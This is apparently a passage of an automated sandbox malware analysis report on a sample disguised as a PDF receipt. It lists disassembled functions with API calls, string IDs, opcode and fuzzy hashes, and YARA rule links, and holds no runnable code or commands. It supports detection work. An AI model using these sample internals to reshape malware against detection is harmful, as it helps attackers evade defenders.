                                                                                                                                                          • Instruction ID: c7306cbd9fd06503eaffd6bd7c1a85817a06db38c03aacaf7c3feb099a49ce91
                                                                                                                                                          • Opcode Fuzzy Hash: 1b4f5e02ca53251b0196cdc885e01e057232d8ca017c5a0c020e7e7dd9d69ccf
                                                                                                                                                          • Instruction Fuzzy Hash: A5818D34A01505DFCB24CF69C8849EBBBB2BF89314B24A569D405F7369DB39EC41CBA0
                                                                                                                                                          Function 00EB9C30 Relevance: 2.7, Strings: 2, Instructions: 151COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 4'kq$4'kq
                                                                                                                                                          • API String ID: 0-4171853269
                                                                                                                                                          • Opcode ID: 92b83cda7961ab89d56bf1c331f804b3d473dc0ac0a1514c1e02401bbbde6618
                                                                                                                                                          • Instruction ID: 98756b3c94c65fd3078009e133ea05ac3d9cd56a4a93f93265d0777315ca5cd6
                                                                                                                                                          • Opcode Fuzzy Hash: 92b83cda7961ab89d56bf1c331f804b3d473dc0ac0a1514c1e02401bbbde6618
                                                                                                                                                          • Instruction Fuzzy Hash: 4351A0307042459FDB10DF69C944BABBBE6EF89314F148466EA08DB266DB75CD02CBA1
                                                                                                                                                          Function 00EB0CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: LRkq
                                                                                                                                                          • API String ID: 0-1052062081
                                                                                                                                                          • Opcode ID: 674ab1633a3343aa3a66a536163bf79df4c743b01f633d2ea54c3fac88209bbb
                                                                                                                                                          • Instruction ID: 17d2f649c63ca35ad75faab98d069839286bd84d717684dac25906aa988b99db
                                                                                                                                                          • Opcode Fuzzy Hash: 674ab1633a3343aa3a66a536163bf79df4c743b01f633d2ea54c3fac88209bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 6452BD74A00219CFCB64EF64ED94B9DBBB2FB48315F1085A5D409A7368DB346E86CF90
                                                                                                                                                          Function 055C6F9C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,055C735E,?,?,?,?,?), ref: 055C741F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                          • Opcode ID: b63d6a348579373675eb73e78976f9001ee48f3f8e2f960f0de40b9effb4433c
                                                                                                                                                          • Instruction ID: 7f6d7300d67106ddfe803dc84ae92a5a4bd68d2949a3d0e84b5d7412580ba59e
                                                                                                                                                          • Opcode Fuzzy Hash: b63d6a348579373675eb73e78976f9001ee48f3f8e2f960f0de40b9effb4433c
                                                                                                                                                          • Instruction Fuzzy Hash: 5321D2B59002189FDB10CFAAD584AEEBFF4FB48320F14845AE918A7310D374A950CFA4
                                                                                                                                                          Function 055C7390 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,055C735E,?,?,?,?,?), ref: 055C741F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                          • Opcode ID: 8f4c87b3d360a1c230b4cd5ca30aedc43f61eed857a75ea59454578b5dc765db
                                                                                                                                                          • Instruction ID: 28c96415c6cae6577d054d7b2df94b121e20e9126df0c3be222f640c6c893e83
                                                                                                                                                          • Opcode Fuzzy Hash: 8f4c87b3d360a1c230b4cd5ca30aedc43f61eed857a75ea59454578b5dc765db
                                                                                                                                                          • Instruction Fuzzy Hash: 3421E3B5910218DFDB10CFAAD984ADEBFF8FB48310F14845AE958A3350D774A940CFA4
                                                                                                                                                          Function 055C7B7C Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,055C9058,03A742A8,02B7EC3C), ref: 055C90E9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EnumThreadWindows
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2941952884-0
                                                                                                                                                          • Opcode ID: 93c0c5de34e41907176a886326c7357ad8e1bfe72118ad1b9c6317acb249bd71
                                                                                                                                                          • Instruction ID: 585abf05bec5c9d995999261e97958cdac24aa46a1b29c2940a2a5db8d941f7f
                                                                                                                                                          • Opcode Fuzzy Hash: 93c0c5de34e41907176a886326c7357ad8e1bfe72118ad1b9c6317acb249bd71
                                                                                                                                                          • Instruction Fuzzy Hash: 852129719002098FDB14CF9AC844BEEFBF9FB48320F14846AE455A7250D778A944CFA5
                                                                                                                                                          Function 055C9070 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,055C9058,03A742A8,02B7EC3C), ref: 055C90E9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EnumThreadWindows
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2941952884-0
                                                                                                                                                          • Opcode ID: 89bd2db29171196d29a1f70c0d3f0b7fa750940dc59505aa8b2d641ce2b6a59f
                                                                                                                                                          • Instruction ID: 9008f8790d5911612916364a282e66c8cdca918e0e7a8c2cc81eb0678d49b3eb
                                                                                                                                                          • Opcode Fuzzy Hash: 89bd2db29171196d29a1f70c0d3f0b7fa750940dc59505aa8b2d641ce2b6a59f
                                                                                                                                                          • Instruction Fuzzy Hash: 7C2115B590024A8FDB14CFAAC944BEEFBF5FF48320F14846AD455A7250DB78A944CF61
                                                                                                                                                          Function 055C9400 Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • MessageBoxW.USER32(?,00000000,00000000,?), ref: 055C9485
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2030045667-0
                                                                                                                                                          • Opcode ID: e7ceb850be486d7c896f7a0b266a1d17bc8b8bf167eb1114a974d94e661b2119
                                                                                                                                                          • Instruction ID: e97220fcce480a0e73e5873f0ffa738b056ca510fde2b01948e24e70e6510d7b
                                                                                                                                                          • Opcode Fuzzy Hash: e7ceb850be486d7c896f7a0b266a1d17bc8b8bf167eb1114a974d94e661b2119
                                                                                                                                                          • Instruction Fuzzy Hash: C621F0B6900309DFCB14CF9AD884ADEBBB5FB48310F14856EE859A7600D375A544CBA0
                                                                                                                                                          Function 055C9408 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • MessageBoxW.USER32(?,00000000,00000000,?), ref: 055C9485
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2030045667-0
                                                                                                                                                          • Opcode ID: da715464a419afad7d2434c0a66a8dcd14d67b6607ab534a27081d30c4b7e3a0
                                                                                                                                                          • Instruction ID: 2f75a2668b21c9f66ab3936f55b4a0f3cb1befb3da8b81dd41f68ce641c04bcc
                                                                                                                                                          • Opcode Fuzzy Hash: da715464a419afad7d2434c0a66a8dcd14d67b6607ab534a27081d30c4b7e3a0
                                                                                                                                                          • Instruction Fuzzy Hash: 2421E0B69013599FCB14CF9AD884ADEFBF5FB88310F14856EE819A7200C375A544CFA5
                                                                                                                                                          Function 055C7B10 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 055C821D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                          • Opcode ID: 281f96dedf0a54301123af80617e18c9273dcc6ae8650567e7ceb88f4af15e6f
                                                                                                                                                          • Instruction ID: 105a7a88824b762a80dd2f56f46eed3ab6df9f6e21c9a4685e91e4adf503592e
                                                                                                                                                          • Opcode Fuzzy Hash: 281f96dedf0a54301123af80617e18c9273dcc6ae8650567e7ceb88f4af15e6f
                                                                                                                                                          • Instruction Fuzzy Hash: 3B1100B19007488FCB20DFDAD488BDEBFF8EB48320F20845AD519A7210C778A944CFA5
                                                                                                                                                          Function 055C81C0 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 055C821D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                          • Opcode ID: f2351bf61b6681ae19e6949d9dc0be7aa6b64ccf3b77193d6041f64855a16378
                                                                                                                                                          • Instruction ID: 87b98159a6938d5be7d55b35e4b0fdfc7aa04bd9077a364118f427985e9637a9
                                                                                                                                                          • Opcode Fuzzy Hash: f2351bf61b6681ae19e6949d9dc0be7aa6b64ccf3b77193d6041f64855a16378
                                                                                                                                                          • Instruction Fuzzy Hash: AF1100B59007488FCB20DF9AD448BDEBFF8FB48320F24845AE519A7210C779A944CFA5
                                                                                                                                                          Function 00EBAEF0 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (okq
                                                                                                                                                          • API String ID: 0-2789353238
                                                                                                                                                          • Opcode ID: e58948f25cab0593660d884e02b5107fb5b0d3235ff3e26181dcf58e512ea0ae
                                                                                                                                                          • Instruction ID: 74022b65708b5a056167647badfff40ba0cd129a5375ecb42204fab14498734b
                                                                                                                                                          • Opcode Fuzzy Hash: e58948f25cab0593660d884e02b5107fb5b0d3235ff3e26181dcf58e512ea0ae
                                                                                                                                                          • Instruction Fuzzy Hash: CD41DF31B002149FCB25AF68D854AFF7BB6FFC9320B14506AE516E7291DB758D018BA1
                                                                                                                                                          Function 00EBE007 Relevance: .7, Instructions: 652COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 20c09e37b255ddef7a407e81083e5d722a35627f671c32e98178db7ec11c0040
                                                                                                                                                          • Instruction ID: 8601badda404c502918b2273dbb29cc2b94e1e0288dec212c08bdbe2d9770777
                                                                                                                                                          • Opcode Fuzzy Hash: 20c09e37b255ddef7a407e81083e5d722a35627f671c32e98178db7ec11c0040
                                                                                                                                                          • Instruction Fuzzy Hash: 0D129A758222479FD2607B30E6AC12ABB61FB0F367704AC90F19FE4459AF7A1449CB61
                                                                                                                                                          Function 00EBE018 Relevance: .6, Instructions: 647COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 534a6f3f1ad5f29766554c015b61abfa483137306dfbb9ee62ab837a6f49bbfb
                                                                                                                                                          • Instruction ID: 0ac9cb5d99eba13808e94c2cc0e4bc34dde135982fbf2e4d6a01e1150c7e3dd7
                                                                                                                                                          • Opcode Fuzzy Hash: 534a6f3f1ad5f29766554c015b61abfa483137306dfbb9ee62ab837a6f49bbfb
                                                                                                                                                          • Instruction Fuzzy Hash: 931299758222479FD2607B30E6AC13ABB61FB0F367704AC90F19FE4459AF7A1449CB61
                                                                                                                                                          Function 00EB80D8 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0baa1210bc60bad0101a68b091edeb308fe240b4675b1e52834ef08038046f9b
                                                                                                                                                          • Instruction ID: 2e6cfa65c99c032e435cfd386e4e3501a367da70000a165dbb69063a93916789
                                                                                                                                                          • Opcode Fuzzy Hash: 0baa1210bc60bad0101a68b091edeb308fe240b4675b1e52834ef08038046f9b
                                                                                                                                                          • Instruction Fuzzy Hash: 127139347006058FCB25DF68CA94AEB7BE9AF99304F1550A9E805EB371DB71DC41CB50
                                                                                                                                                          Function 00EBF3F9 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 07de832c975e8ca2b03c6c32f614ab1941545b32ecf158261db1610413673475
                                                                                                                                                          • Instruction ID: b7f40dec6be9ff8f2bd2773c0fea7995b29847e9265718312641bcf37100c672
                                                                                                                                                          • Opcode Fuzzy Hash: 07de832c975e8ca2b03c6c32f614ab1941545b32ecf158261db1610413673475
                                                                                                                                                          • Instruction Fuzzy Hash: 2851D074D01219CFDB14DFA5D954AAEBBB2FF89300F208529D815BB3A8DB355A86CF40
                                                                                                                                                          Function 00EBD548 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 430473b819531de1d21144a0e4259e951f501a23560717c0865146a44160ce14
                                                                                                                                                          • Instruction ID: 6aaa50df6d844c306859aa2e6accb205778aa0cbd7d71e038eac56578e59683f
                                                                                                                                                          • Opcode Fuzzy Hash: 430473b819531de1d21144a0e4259e951f501a23560717c0865146a44160ce14
                                                                                                                                                          • Instruction Fuzzy Hash: 3B518274E012189FDB44DFAAD9849DDBBF2BF89310F249169E805AB364DB30A905CF50
                                                                                                                                                          Function 00EB41A0 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 07c2d4c4b298beb1fcb8a0507f7de1990a35812043074908c7032d524ca81ab2
                                                                                                                                                          • Instruction ID: f812bc3f6215697b9d0015ef93c9eb6de9f59ddcd2cb3b970cfcb038490c282b
                                                                                                                                                          • Opcode Fuzzy Hash: 07c2d4c4b298beb1fcb8a0507f7de1990a35812043074908c7032d524ca81ab2
                                                                                                                                                          • Instruction Fuzzy Hash: 9E519474E01208CFCB48DFA9D98499DBBF2FF89310B209569E805BB365DB35A946CF50
                                                                                                                                                          Function 00EBA303 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a8f866fff6ef8261eaa00a795717f2fb02b4c6446e7924265fd59db563b7921e
                                                                                                                                                          • Instruction ID: 06737fb536f7fdd145596e277edbcda0c50b104bed095f9956ebf946d28cf3fe
                                                                                                                                                          • Opcode Fuzzy Hash: a8f866fff6ef8261eaa00a795717f2fb02b4c6446e7924265fd59db563b7921e
                                                                                                                                                          • Instruction Fuzzy Hash: E0519D31A04249DFCF11CFA8C848AEEBBF2EF45314F188566E855AB261D375D914CB62
                                                                                                                                                          Function 00EB5658 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ad9c38378dbd8dc8ddd2c4ab8db4d24c3fb457b5bee0d46cc1d5ee7942812885
                                                                                                                                                          • Instruction ID: 9d4a121cb75031f90dde66741106b9e69d8bdb540de0fb1b851a0f1c4e1d5263
                                                                                                                                                          • Opcode Fuzzy Hash: ad9c38378dbd8dc8ddd2c4ab8db4d24c3fb457b5bee0d46cc1d5ee7942812885
                                                                                                                                                          • Instruction Fuzzy Hash: 65319F32700509EFCB15AF64D844AEF3BB2FB48300F109015F955A7258CB76CE61DBA0
                                                                                                                                                          Function 00EB8370 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5d8102d2c45d3f3dc8c4e9867ae0e78160fe14831ed33635485d28f7015e004f
                                                                                                                                                          • Instruction ID: 62a02aad31feea2ed8bd57546a7a05e144d5060020f82b3fa2e47bb660478b0f
                                                                                                                                                          • Opcode Fuzzy Hash: 5d8102d2c45d3f3dc8c4e9867ae0e78160fe14831ed33635485d28f7015e004f
                                                                                                                                                          • Instruction Fuzzy Hash: 9B2106303002138BCB251B758654ABF36AFAFD435C714503AD562EB3A8DE39CC42D381
                                                                                                                                                          Function 00EB8380 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: aeb8abf0cd949ed2a82c7e9bcb48211628fee68ad98554952a118f6c69ec7738
                                                                                                                                                          • Instruction ID: df482cf2a8b2b8952770e48affb2d43956b6abfbf0a56dfaf653b30e292604d2
                                                                                                                                                          • Opcode Fuzzy Hash: aeb8abf0cd949ed2a82c7e9bcb48211628fee68ad98554952a118f6c69ec7738
                                                                                                                                                          • Instruction Fuzzy Hash: 2621C5303001138BDB245A658654BBF229FAFD475DF24A039D562EB7A8DE7ACC42D381
                                                                                                                                                          Function 00EB62F0 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4ab4068235cc88678d2851ff36769385f9e33cbbab8f0b71e59aa60169a8f369
                                                                                                                                                          • Instruction ID: c5543e66d4aba7a02f4d36f8d382eb8e2c58a70cd312e432c9de7672c23e49d4
                                                                                                                                                          • Opcode Fuzzy Hash: 4ab4068235cc88678d2851ff36769385f9e33cbbab8f0b71e59aa60169a8f369
                                                                                                                                                          • Instruction Fuzzy Hash: 1621F231B046118FC725AA35C45896FB7E2EFC57557188069E856EB3A8CF39DC028B80
                                                                                                                                                          Function 00EB28F0 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: eaa6d1b13fcb36f025dcc757fffedd9cff0471f050fa0074f0b0e1da8a985430
                                                                                                                                                          • Instruction ID: d7dc96b61de05abee91bff0308ffb3a1070d4c6304bc23d5949f6574a66d768e
                                                                                                                                                          • Opcode Fuzzy Hash: eaa6d1b13fcb36f025dcc757fffedd9cff0471f050fa0074f0b0e1da8a985430
                                                                                                                                                          • Instruction Fuzzy Hash: E0217F35A00105AFCB15DA24C540AEF77A5EFD9360F10855DD91A9B258DB30EE42CBD0
                                                                                                                                                          Function 00E1D554 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4148976431.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_e1d000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 176996e1983fec2e311f40f48a3222465bf804756ff1978b91823e60943c33f1
                                                                                                                                                          • Instruction ID: 5dc2a9a8a546d6bc4059dc197b6ce2eb59b991da0d5446c1cd717001ef81e89c
                                                                                                                                                          • Opcode Fuzzy Hash: 176996e1983fec2e311f40f48a3222465bf804756ff1978b91823e60943c33f1
                                                                                                                                                          • Instruction Fuzzy Hash: 26212271508240EFCB05DF14DDC0BABBF66FB98318F20C569E8095B256C336D896CAA2
                                                                                                                                                          Function 00E2D118 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149096181.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_e2d000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
